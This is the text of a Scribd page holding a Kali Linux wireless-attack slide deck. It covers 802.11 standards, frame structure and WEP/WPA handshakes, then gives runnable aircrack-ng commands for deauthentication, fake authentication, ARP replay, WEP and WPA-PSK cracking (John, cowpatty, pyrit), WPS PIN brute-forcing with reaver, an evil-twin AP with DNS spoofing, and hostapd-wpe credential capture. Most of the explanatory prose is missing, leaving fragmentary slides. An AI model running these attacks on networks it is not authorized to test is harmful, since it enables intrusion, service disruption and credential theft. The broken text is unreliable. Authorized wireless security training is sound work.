Scribd
Upload
48 views184 pages

Overview of IEEE 802.11 ae Standards

The document provides information about the Kali Linux operating system and 802.11 wireless networking standards. It describes various aspects of 802.11 including physical layer specifications, media access control protocols, and encryption standards supported.

Uploaded by

kingl3t777
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views184 pages

Overview of IEEE 802.11 ae Standards

The document provides information about the Kali Linux operating system and 802.11 wireless networking standards. It describes various aspects of 802.11 including physical layer specifications, media access control protocols, and encryption standards supported.

Uploaded by

kingl3t777
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 184

Kali linux

[email protected]



• aircrack-ng suite


• AP
802.11
Working Group Description
IEEE
IEEE 802.1 Bridging (networking) and Network Management
IEEEInstitute of Electrical and Electronics Engineers

802.2 LLC
IEEE •802.3 Ethernet
IEEE 802.4 40 Bus
Token
•IEEEIEEE
802.5 Defines the Committees
MAC Layer for a Token Ring802 lan
IEEEman
802.6 MANs
IEEE 802.7 Broadband LAN Using Coaxial Cable

IEEE 802.8 Fiber Optic TAG

IEEE 802.9 Integrated Services LAN
IEEE •802.10 Interoperable LAN Security
IEEE •802.11 a/b/g/n Wireless LAN (WLAN) and Mesh (Wi -Fi Certification)
IEEE 802.12 100BaseVG
IEEE 802.13 Unused
IEEE 802.14 Cable Modems
IEEE 802.15 Wireless PAN


• LLC
• MAC

IEEE 802.11
• 802 11
• IEEE 802.1 1 The Original WLAN Standard – 1 Mbit/s and 2 Mbit/w, 2.4 GHz RF and
IR
• IEEE 802.11a 54 Mbit/s, 5 GHz
• IEEE 802.11b 802.11 Enhancements to Support 5.5 Mbit/s and 11 Mbit/s
• IEEE 802.11c Bridge Operation Procedures
• IEEE 802.11d International (Country to Country) Roaming Extensions
• IEEE 802.11 e Quality of Service ( QoS ), Including Packet Bursting
• IEEE 802.11F Inter -Access Point Protocol
• IEEE 802.11g 54 Mbit/s, 2.4 GHz
• IEEE 802.11h Spectrum Managed 802.11a (5 GHz) for European Compatibility
• IEEE 802.11i Enhanced Security
• IEEE 802.11j Extensions for Japan
• IEEE 802.11k Radio Resource Measurement Enhancements
• IEEE 802.11n Higher Throughput Using Multiple Input, Multiple Output
(MIMO) Antennas
• IEEE 802.11p Wireless Access for the Vehicular Environment (WAVE)
• IEEE 802.11r Fast BSS Transition (FT)
• IEEE 802.11s Mesh Networking, Extended Service Set (ESS)
• IEEE 802.11T Wireless Performance Prediction (WPP)
• IEEE 802.11u Internetworking with Non -802 Networks ( i.e. : Cellular)
• IEEE 802.11v Wireless Network Management
• IEEE 802.11w Protected Management Frames
• IEEE 802.11y 3650 – 3700 MHz Operation in the US
• IEEE 802.11z Direct Link Setup (DLS) Extensions
• IEEE 802.11mb Maintenance of the Standard
• IEEE 802.11aa Robust Streaming of Audio Video Transport Streams
• IEEE 802.11ac Very High Throughput < 6 GHz
• IEEE 802.11ad Very High Throughput, 60 GHz
• IEEE 802.11ae QoS Management
• IEEE 802.11af TV Whitespace
• IEEE 802.11ah Sub 1 GHz
• IEEE 802.11ai Fast Initial Link Setup
• 802.11 – The original WLAN standard
• 802.11a – Up to 54 Mbit/s on 5 GHz
• 802.11b – 5.5 Mbit/s and 11 Mbit/s on 2.4 GHz
• 802.11g – Up to 54 Mbit/s on 2.4 GHz. Backward compatible with 802.11b
• 802.11i – Provides enhanced security
• 802.11n – Provides higher throughput with Multiple Input/Multiple Output (MIMO)
802.11
• 1997
• 1Mbps 2Mbps

• radio frequencies
• Direct-Sequence Spread-Spectrum (DSSS)——
• Frequency Hopping Spread-Spectrum (FHSS)——
• ——CSMA/CA c=b+log2 1+s/n

• Request to Send/Clear to Send (RTS/CTS)


802.11b
• Complementary Code Keying (CCK)——
• 5.5 and 11Mbit/s
• 2.4GHz band (2.4GHz – 2.485GHz)
• 14 channels
• 22MHz

• –1 to 11 (2.412 GHz – 2.462 GHz)


• –1 to 13 (2.412 GHz – 2.472 GHz)
• –1 to 14 (2.412 GHz – 2.484 GHz)
802.11B
802.11A
• 802.11b

• 5GHz
• 2.4GHz
• 5GHz
• Orthogonal Frequency-Division Multiplexing (OFDM)

• 54Mbps 20MHz

• 5.15-5.35 GHz
• 5.7-5.8 GHz
802.11G
• 2.4GHz
• Orthogonal Frequency-Division Multiplexing (OFDM)
• 802.11a
• 802.11b CCK
• 20/22MHz
802.11N
• 2.4 5 GHz
• 300Mbps 600Mbps
• Multiple-Input Multiple-Output (MIMO)

• 40MHz
• 802.11n
• 20/40MHz

• Infrastructure
• AP SSID
• Ad-Hoc
• STA SSID
• Service Set Identifier (SSID)
• AP 10 Beacon SSID
• SSID
802.11
• Infrastructure
• AP STATION Basic Service Set (BSS)
• AP Distribution System (DS)
• DS AP Extended Service Set (ESS)
AD-HOC
• Independent Basic Service Set (IBSS)
• 2 STAs
• peer to peer
• STA AP
• beacon SSID
• STAs
WIRELESS DISTRIBUTION SYSTEM (WDS)
• DS AP
• Bridging—— AP
• Repeating—— AP STA
MONITOR MODE
• Monitor

• 802.11

• monitor Injection
• kali
• kali
• USB
• TL-WN722N
• dmesg
• iwconfig


• USB
• PCMCIA 16bit 802.11b
• Cardbus 32bit PCMCIA 8.0
• Express Cards
• MiniPCI
• MiniPCI Express
• PCI


• Atheros Realtek

• aircrack-ng suite
• http://www.aircrack-ng.org/doku.php?
id=compatibility_drivers#list_of_compatible_adapters
• Aircrack-ng suite
• Alfa Networks AWUS036H
• Realtek 8187
• 1000 mW
• RP-SMA

• dB

• B Alexander Graham Bell


• dB 2

• dBm 1mW dB
• 3dBm 1
• 10dBm 10
• dBi
• dBd
• dBi

• dB
• 300mW 9dBi 2dBi

• mW

• dBm mW
• dBd

• mW dB

W mW
dBm
dB




• 5dBi vs 9dBi





• 3 4
• 90

• 120


LINUX
802.11
• Ieee80211
• iwconfig
• iwlist
• mac80211
• iw

• ifconfig
• iwconfig
• iw list

• iwlist wlan2 frequency
• iw list
• AP
• iw dev wlan2 scan | grep SSID
• iw dev wlan2 scan | egrep "DS\ Parameter\ set|SSID“
• iwlist wlan2 scanning | egrep “ESSID|Channel”

• service network-manager stop
• iw dev wlan2 interface add wlan2mon type monitor
• tcpdump -s 0 –i wlan2mon -p
• Iw dev wlan2mon interface del
802.11

• https://www.kernel.org/doc/htmldocs/80211/index.html

• http://linuxwireless.org/en/users/Drivers/
RADIOTAP
RADIOTAP
• 802.11 802.11 Radiotap
• Linux API Radiotap
• 802.11 802.11 Radiotap
MAC Radiotap
• Radiotap 802.11

RADIOTAP
• Header data
• Version 8bit
• 0
• Pad 8bit

• Length 16bit
• radiotap 802.11
• Present 32bit
• Data
• Ext 1 0
• MAC
802.11
802.11
• DU Data Unit
• Encapsulation
• SDU Service Data Unit / PDU Protocol Data Unit
• MSDU→MIC → → IV → → MAC →MPDU
• MPDU/PSDU + =PPDU →RF
802.11
• 802.11 MAC
802.11
• Protocol Version 2bit : 802.11 0 1 2 3
• Type 2bit : 3
• 1
• 2
• 0
• SubType 4bit
• /
802.11
802.11
• To DS / From DS 1 / 1 bit
• DS DS MAC 4 Address
802.11
• 0x00 IBSS Management Control
STSL Station to Station Link STA AP
• 0x01 Data AP STA
• 0x02 Data STA AP
• 0x03 AP WDS Wireless Distribution System
AP Mesh MP Address4
802.11
• More frag 1bit :
• 1 Data Management

• Retry 1bit :
• 1 Data Management

• Power Mgmt 1bit : (0) / (1)


• STA AP 1 AP
STA Data AP
802.11
• More Data 1bit
• AP MSDU STA 1
STA STA AP PS-Poll AP
AP /
• Protected Frame 1bit
• Data Management MSDU PSK
Frame#3 0
• Order 1bit
• QoS 1 0
802.11
• Duration/ID 16bit
• Control Type/SubType
• PS Poll type:1, subtype:10 STA AID association
identity

NAV Network Allocation Vector
802.11
• MAC Layer Address
• 4 Basic service set ID (BSSID) BSS 2
Infrastructure BSSID AP MAC AP BSS
BSSID
802.11
• Sequence Control 16bit
• Sequence Number Fragment Number
• Sequence Number 0—4095 1
Sequence Number
• Fragment Number 0—15 1
802.11
• Frame Body
• MSDU 2304 256
2048
• WEP: 8 bytes → 2312 bytes
• TKIP (WPA1): 20 bytes → 2324 bytes
• CCMP (WPA2): 16 bytes → 2320 bytes

• Control Frame Body


802.11
• FCS 32bit
• MAC Frame Body CRC FCS Frame
Check Sequence
ACK FCS /
• wireshark FCS
CONTROL FRAME
CONTROL FRAME

ACK
• ACK
• ACK
• ACK

• T/S 1/13
PS-POLL
• RF



PS-POLL
• AID——Association ID
• STA
• AP AP
• Beacon TIM traffic indication map
• AID
• STA AID
• STA PS-Poll AP
• ACK
• ACK AP
• STA
• STA
PS-POLL
• AP PS-Poll


• AID ID
• BSSID STA AP
• TA STA
RTS/CTS
• RTS/CTS CSMA/CA



RTS/CTS
• Node1 Request to Send Node2
• Node2 Clear to Send Node1
• Node1
• Node2 ACK Node1
RTS/CTS
• CSMA/CD
• CSMA/CA

RTS/CTS
• RTS 20

• CTS 14
MANAGEMENT FRAME
MANAGEMENT FRAME
• STA AP
BEACON FRAMES
• AP BSSID

• 102.4ms
• 1024 microseconds 60
• SSID
• AP SSID
BEACON FRAMES
BEACON FRAMES

IBSSI Status
• 0 infrastructure
• 1 ad-hoc

Privicy

Wep

ESSID

• 802.11 g 1——54Mbit


11
PROBE REQUEST FRAMES
• STA AP
• AP
• AP
PROBE RESPONSE FRAMES
• AP ESSID AP
AUTHENTICATION FRAMES
AUTHENTICATION FRAMES
• Authentication Algorithm
• 0
• 1

• Authentication Seq
• Seq

1-65535

Challenge text

• Status Code /
ASSOCIATION/REASSOCIATION FRAMES
• STA
• Association Request
• Reassociation Request
• Association Response
ASSOCIATION REQUEST FRAMES
REASSOCIATION REQUEST FRAME
ASSOCIATION RESPONSE
• AP STA
• /
DISASSOCIATION/DEAUTHENTICATION
• AP
• 2
DISASSOCIATION/DEAUTHENTICATION
ATIM FRAMES
• ad-hoc
• STA
DATA FRAME
DATA FRAMES
AUTHENTICATION FRAMES

• DATA Frame

• Null data frame
• MAC FCS
• STA
• Probe
• STA probe AP
• AP Response
• Authentication
• STA AP

• AP STA
• Association
• STA
• AP

WEP
• Beacon WEP
• STA Probe
• AP Probe Response WEP
WPA
• AP Beacon WPA
• 802.11
• WPA1
WEP OPEN
• WEP Open open
• WEP

• AP STA


WEP PSK
• STA
• AP Challenge
• STA PSK Cha AP
• AP PSK Cha
Cha

• open PSK
WEP

• STA AP
• AP STA
• AP
• STA AP ESSID
• AP

• 802.11

• Wired Equivalent Privacy (WEP)


• 802.11

• Wi-Fi Protected Access WPA WEP


• WPA2 802.11i
OPEN

• STA AP
WEP
• Rivest Cipher 4 (RC4)
• CRC32
• 24 initialization vector (IV)

• 64bit key
• 24bit IV key 40bit
• 128bit key WEP 24bit IV
RC4
• RSA

• XOR
• XOR
• RC4 key
• IV SKA Key Scheduling Algorithm (KSA)
• Pseudo-Random Generation Algorithm (PRGA)
RC4
RC4
RC4
WPA
• Wi-Fi Protected Access
• 802.11i
• Temporal Key Integrity Protocol TKIP
• WPA1 WEP
• Counter Mode with CBC-MAC CCMP
• WPA2
• WPA
• WPA
• WPA 802.1X Radius AAA
WPA1
• 802.11i
• WEP

• 128 key 48 (IV


• RC4

• TKIP Michael MIC


• WEP CRC32

WPA2
• 802.11i
• Robust Security Network (RSN)
• CCMP TKIP
• AES RC4

WPA


WPA-PSK



• PSK / 802.1X
• /
• TKIP / CCMP
• STA probe


WPA
• Extensible Authentication Protocol (EAP)
• EAP-TLS
• EAP-TTLS
• PEAP

• AP Radius Server
• Radius Server “Radius Accept”
• Master Key MK
• AP EAP STA

• AP

pairwise key PTK


group key GTK


PMK

• MK TLS-PRF PMK

• radius AP
• AP EAP STA
• PSK
• Essid + PSK + 4096——Hash
• STA AP PMK
• 256 32
• PTK
• HMAC-SHA1
• PRF-X


• PTK
• AP Anonce STA
• STA Snonce PTK
• Snonce PTK MIC AP
• AP Snonce PTK
• AP MIC MIC
• MIC STA PMK
• AP GTK STA
• STA ACK

• Temporal Key Integrity Protocol (TKIP) 4
• Counter Mode with CBC-MAC (CCMP) 5
• Wireless Robust Authenticated Protocol (WRAP) 6
AIRCRACK-NG


AIRMON-NG

• airmon check
• airmon check kill
• airmon start wlan2 3
• iwlist wlan2mon channel
• airmon stop wlan2mon
AIRODUMP-NG

• airodump-ng wlan2mon
• airodump wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap
• aireplay -9 wlan2mon
• airreplay
AIRODUMP-NG
• airodump-ng wlan2mon
• airodump wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap
• airodump wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap --ivs
AIRODUMP-NG
• BSSID AP MAC
• PWR
-1 STA
• RXQ 10

• Beacons AP beacon
• #Data WEP IV
• #/s 10
• CH beacon
• MB AP
• ENC WEP WPA WPA2 OPEN
AIRODUMP-NG
• CIPHER CCMP TKIP WEP40 WEP104
• AUTH MGT PSK SKA OPEN
• ESSID AP airodump probe
association request AP
• STATION STA MAC
• Lost sequence number 10 STA



• Packets STA
• Probes STA ESSID
AIRODUMP-NG
• AP STA
• BIOS
• managed
• network-manager
• rmmod modprobe
• airodump-ng
• airmon-ng check kill
• wpa_supplicant
AIREPLAY-NG


• WEP WPA
• 10

• (-i)
• pcap (-r)
AIREPLAY-NG
• aireplay-ng <options><interface name>
• Filter 0 1
AIREPLAY-NG
• Replay
AIREPLAY-NG
• Aireplay-ng
• AP
• “write failed: Cannot allocate memory wi_write(): illegal seek”
• Broadcom bcm43xx b43
• “rtc: lost some interrupts at 1024Hz”
• aireplay-ng
• -h MAC MAC
• macchange
• 00:11:11:11:11:11 / -h 00:22:22:22:22:22
AIREPLAY-NG

• AP

• AP probe
• AP 30

AIREPLAY-NG

• aireplay -9 wlan2mon
• AP/ SSID
• aireplay-ng -9 -e leven -a EC:26:CA:FA:02:DC wlan2mon
AIREPLAY-NG
• card to card

• -i AP
• 5/7 Faild
• MAC MAC
MAC
MAC
• MAC
• MAC

• AP
• AP
• Open

• MAC
WEP
WEP
• WEP
• IV
• 224 IV
• IV IV
• ARP IV
• IV wep
WEP
• monitor

• Deauthentication XOR
• XOR AP
• ARP
• Deauthentication ARP
• DATA
FAKE AUTHENTICATION
• WEP AP
• ARP
• aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>
• aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your
MAC><interface>
• 6000 reauthentication
• -o 1
• -q 10 10 keep-live
FAKE AUTHENTICATION
• AP MAC OUI
• MAC
• Denied (Code 1) is WPA in use
• WPA/WPA2 Fake authentication
• MAC
• AP

DEAUTHENTICATION
• AP
• ARP AP IV
• WPA 4

• aireplay-ng -0 0 -a <AP MAC> -c <Client MAC> <interface name>


• -c
• 128 64 AP 64

DEAUTHENTICATION

• b n g

ARP
• ARP AP
• AP IV

• aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name>


• -h / MAC
• Airodump-ng data
• 64bit 25
• 128bit 150
WEP
• Airecrack-ng wep.cap
WPA
HTTP://ETUTORIALS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/
WPA PSK

• WPA WEP

• CPU


• Crunch
• Kali
WPA PSK
• PSK
• monitor

• Deauthentication 4

WPA PSK
• AP WPA
• monitor

• probe ESSID AP


AIROLIB
• ESSID
• PMK
• PMK PTK

• SQLite3
AIROLIB
• echo kifi > essid.txt
• airolib-ng db --import essid essid.txt
• airolib-ng db --stats
• airolib-ng db --import passwd <wordlist>
• WPA
• airolib-ng db –batch
• PMK
• aircrack-ng -r db wpa.cap
JTR
• John the ripper


• JTR
• /etc/john/john.conf
• [List.Rules:Wordlist]
• $[0-9]$[0-9]$[0-9]
JTR

• john --wordlist=password.lst --rules --stdout | grep -i Password123

• john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w - wpa.cap

COWPATTY
• WPA

• cowpatty -r wpa.cap -f password.lst -s kifi
• PMK
• genpmk -f password.lst -d pmkhash -s kifi
• cowpatty -r wpa.cap -d pmkhash -s kifi
PYRIT
• airolib cowpatty PMK

• CPU pyrit GPU PMK
• Airodum
• airodump
• WAP
• pyrit -r wlan2mon -o wpapyrit.cap stripLive
• pyrit -r wpapyrit.cap analyze
• airodump
• pyrit -r wpa.cap -o wpapyrit.cap strip
PYRIT

• pyrit -r wpapyrit.cap -i password.lst -b <AP MAC> attack_passthrough

• SQL PMK
• pyrit eval
• pyrit -i password.lst import_passwords
• ESSID pyrit -e kifi create_essid
• PMK pyrit batch GPU
• pyrit -r wpapyrit.cap -b <AP MAC> attack_db
WPS
WPS WIRELESS PROTECTED SETUP
• WPS WiFi 2006
• PIN PSK

• PIN 4 2 8

• 2011
• 4
• PIN 4 1000 checksum
• 11000
• PSK 218,340,105,584,896

WPS WIRELESS PROTECTED SETUP
• Linksys WPS
• WEB WPS

• 4-10
• PSK
• PIN
• C83A35
• 00B00C
WPS WIRELESS PROTECTED SETUP
• WPS AP
• wash -C -i wlan0mon
• airodump-ng wlan0mon --wps

• PIN
• reaver -i wlan0mon -b <AP mac> -vv
• PIN
• reaver -i wlan0mon -b <AP mac> -vv -K 1
• pixiewps

• reaver -i wlan0mon -b <AP mac> -vv -p 88888888


WPS WIRELESS PROTECTED SETUP

• AP WPS

• wifite
EVIL TWIN AP / ROGUE AP
EVIL TWIN AP / ROGUE AP

• 20%
EVIL TWIN AP / ROGUE AP
• airbase-ng -a <AP mac> --essid “kifi” -c 11 wlan2mon
• apt-get install bridge-utils
• brctl addbr bridge
• brctl addif Wifi-Bridge eth0
• brctl addif Wifi-Bridge at0
• ifconfig eth0 0.0.0.0 up
• ifconfig at0 0.0.0.0 up
• ifconfig bridge 192.168.1.10 up
• route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
EVIL TWIN AP / ROGUE AP
• echo 1 > /proc/sys/net/ipv4/ip_forward

• dnspoof -i bridge -f dnsspoof.hosts


• /usr/share/dsniff/dnsspoof.hosts
• apachet2ctl start
EVIL TWIN AP / ROGUE AP
• 3vilTwinAttacker
• git clone https://github.com/P0cL4bs/3vilTwinAttacker.git
• cd 3vilTwinAttacker
• chmod +x installer.sh
• ./installer.sh --install

• iptables
WPA
• hostapd-wpe
• FreeRADIUS-wpe
• EAP-FAST/MSCHAPv2 (Phase 0)
• PEAP/MSCHAPv2
• EAP-TTLS/MSCHAPv2
• EAP-TTLS/MSCHAP
• EAP-TTLS/CHAP
• EAP-TTLS/PAP
WPA

• git clone https://github.com/OpenSecurityResearch/hostapd-wpe
• apt-get install libssl-dev libnl-dev
• libnl1 libnl-dev kali2.0
• wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-
dev_1.1-7_amd64.deb
wget http://ftp.debian.org/debian/pool/main/libn/libnl/
libnl1_1.1-7_amd64.deb
dpkg -i libnl1_1.1-7_amd64.deb
dpkg -i libnl-dev_1.1-7_amd64.deb
WPA
• wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
• tar -zxf hostapd-2.2.tar.gz
• cd hostapd-2.2
• patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
• cd hostapd
• make
WPA

• cd ../../hostapd-wpe/certs
./bootstrap
• service network-manager stop
• airmon-ng check kill

• ifconfig wlan2 up
• AP
• cd ../../hostapd-2.2/hostapd
./hostapd-wpe hostapd-wpe.conf
WPA
• asleap -C challenge -R response -W <Dictionary_File>
AIRCRACK-NG SUITE
AIRDECAP-NG
• 802.11
• airdecap-ng -b <AP MAC> 1.pcap
• WEP
• airdecap-ng -w <WEP key>-b <AP MAC> 1.pcap
• AP
• WPA
• airdecap-ng -e kifi -p <PSK> -b <AP MAC> 1.pcap
• 4
AIRSERV-NG

• /


• airserv-ng -p 3333 -d wlan2mon

• airodump-ng 192.168.1.1:3333
• C/S
AIRTUN-NG
• wIDS
• BSSID


• Repeate / Replay
AIRTUN-NG
• wIDS
• WEP: airtun-ng -a <AP MAC> -w SKA wlan2mon
• WPA: airtun-ng -a <AP MAC> -p PSK -e kifi wlan2mon
• ifconfig at0 up

• AP wIDS 2 AP
• WPA: airtun-ng -a <AP MAC> -p PSK -e kifi1 wlan2mon
• ifconfig at1 up
• AP airodump -c 1,11 wlan2mon
AIRTUN-NG
• Repeate
• WDS/Bridge

• monitor
• airtun-ng -a <AP MAC> --repeat --bssid <AP MAC> -i wlan0mon
wlan2mon
• wlan0mon

• wlan2mon
• -a
• --bssid
AIRTUN-NG
• Replay
• CAP
• airtun-ng -a <Source MAC> -r 1.cap <interface>
• bessid-ng
• fern-wifi-cracker
• kismet
• kismet*.nettxt
• kismet*.pcapdump

• gpsd -n -N -D4 /dev/ttyUSB0


• giskismet -x Kismet-*.netxml
• giskismet -q "select * from wireless" -o gps.kml
• Google
• http://dl.google.com/dl/earth/client/current/google-earth-
stable_current_amd64.deb
• dpkg -i google-earth64.deb
• apt-get -f install
Q&A

You might also like